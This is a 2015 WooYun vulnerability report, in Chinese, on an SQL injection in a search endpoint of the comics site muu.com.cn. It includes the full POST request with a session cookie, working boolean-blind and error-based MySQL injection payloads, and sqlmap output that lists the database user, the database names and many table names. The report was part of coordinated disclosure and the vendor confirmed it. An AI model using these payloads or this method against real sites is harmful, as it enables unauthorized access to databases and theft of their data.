当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115926

漏洞标题:漫悠悠主站SQL注射影响全站数据库2

相关厂商:muu.com.cn

漏洞作者: 路人甲

提交时间:2015-05-25 19:00

修复时间:2015-07-10 09:38

公开时间:2015-07-10 09:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-25: 细节已通知厂商并且等待厂商处理中
2015-05-26: 厂商已经确认,细节仅向厂商公开
2015-06-05: 细节向核心白帽子及相关领域专家公开
2015-06-15: 细节向普通白帽子公开
2015-06-25: 细节向实习白帽子公开
2015-07-10: 细节向公众公开

简要描述:

233

详细说明:

post注入
POST /paxy/safeCampusSearch.html HTTP/1.1
Content-Length: 142
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: www.muu.com.cn
Cookie: JSESSIONID=abcmO14VJs6AS6IHT_e2u; read1=13059%2C%E5%9B%9B%E5%8F%B6%E5%A8%83%E5%A8%83%E5%92%8C%E5%91%9C%E5%96%B5-%E9%AB%98%E8%80%83-%E7%AC%AC1%E9%A1%B5%2C%2Fcomics%2F13059%2F88003_1.html%2C%2Fcomics%2F13059%2F88003_1.html%2C2%2C19%2C1%2C1; /comics/8490=/comics/8490/50511_1.html; read2=13540%2C%E6%99%B4%E7%A9%BA%E4%B8%8B-%E7%AC%AC%E5%9B%9B%E5%9B%9E-%E7%AC%AC1%E9%A1%B5%2C%2Fcomics%2F13540%2F99880_1.html%2C%2Fcomics%2F13540%2F99880_1.html%2C4%2C15%2C1%2C9; /comics/5924=/comics/5924/76943_1.html; read3=14886%2C41%E5%8E%98%E7%B1%B3%E7%9A%84%E8%B6%85%E5%B9%B8%E7%A6%8F-+%E5%96%9C%E6%AC%A2%E5%B0%B1%E6%98%AF%E5%96%9C%E6%AC%A2%E5%95%8A%EF%BC%81-%E7%AC%AC1%E9%A1%B5%2C%2Fcomics%2F14886%2F113708_1.html%2C%2Fcomics%2F14886%2F113708_1.html%2C52%2C61%2C1%2C1; /comics/11237=/comics/11237/73834_1.html; read4=14722%2C%E4%BD%8E%E4%BF%97%E7%AC%91%E8%AF%B4-4%EF%BC%8C%E6%B8%85%E6%98%8E%E8%B8%8F%E9%9D%92-%E7%AC%AC1%E9%A1%B5%2C%2Fcomics%2F14722%2F110731_1.html%2C%2Fcomics%2F14722%2F110731_1.html%2C4%2C25%2C1%2C1; /comics/4219=/comics/4219/20209_1.html; read5=5157%2C%E6%94%BB%E5%8F%97%E5%B0%8F%E6%97%A5%E5%B8%B8%E7%B3%BB%E5%88%97-%E8%85%90*%E6%94%BB%E5%8F%97%E5%B0%8F%E6%97%A5%E5%B8%B8%E7%B3%BB%E5%88%9701-%E7%AC%AC1%E9%A1%B5%2C%2Fcomics%2F5157%2F24462_1.html%2C%2Fcomics%2F5157%2F24462_1.html%2C1%2C11%2C1%2C1; /comics/5157=/comics/5157/24462_1.html; /comics/2989=/comics/2989/66457_1.html
Host: www.muu.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
content=

漏洞证明:

---
Parameter: content (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: content=%' AND 3862=3862 AND '%'='
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: content=%' AND (SELECT 6038 FROM(SELECT COUNT(*),CONCAT(0x716a767a7
1,(SELECT (ELT(6038=6038,1))),0x7178787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_S
CHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
---
[18:49:39] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[18:49:39] [INFO] fetching current user
[18:49:39] [INFO] retrieved: muu@%
available databases [2]:
[*] information_schema
[*] muu_2014
Database: muu_2014
[163 tables]
+----------------------------------+
| category |
| forum |
| forum_posts |
| forum_topics |
| spider |
| t_view_1 |
| t_view_2 |
| t_w_u_view |
| tb_active |
| tb_ad |
| tb_ad_stat_visit |
| tb_admin_recommend |
| tb_album |
| tb_album_photo |
| tb_authorization |
| tb_authorization_work |
| tb_blacklist |
| tb_bookmark |
| tb_broadcast |
| tb_bulletin |
| tb_classify |
| tb_collection |
| tb_comment |
| tb_comment_reply |
| tb_commercial_favorite |
| tb_dic_bulltype |
| tb_dic_groupclass |
| tb_dic_hittype |
| tb_dic_logtype |
| tb_dic_progress |
| tb_dic_ratingtype |
| tb_dic_readerclass |
| tb_dic_readpermiss |
| tb_dic_recomtype |
| tb_dic_subjectclass |
| tb_dic_syslogtype |
| tb_dic_topicclass |
| tb_dic_usertype |
| tb_dic_workclass |
| tb_editor_follow |
| tb_email |
| tb_excavate |
| tb_excavate_album |
| tb_excavate_show |
| tb_flower_egg |
| tb_greet |
| tb_group |
| tb_group_member |
| tb_group_ship |
。。。。。。。。。。。

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-26 09:36

厂商回复:

谢谢白帽子

最新状态:

暂无


漏洞评价:

评论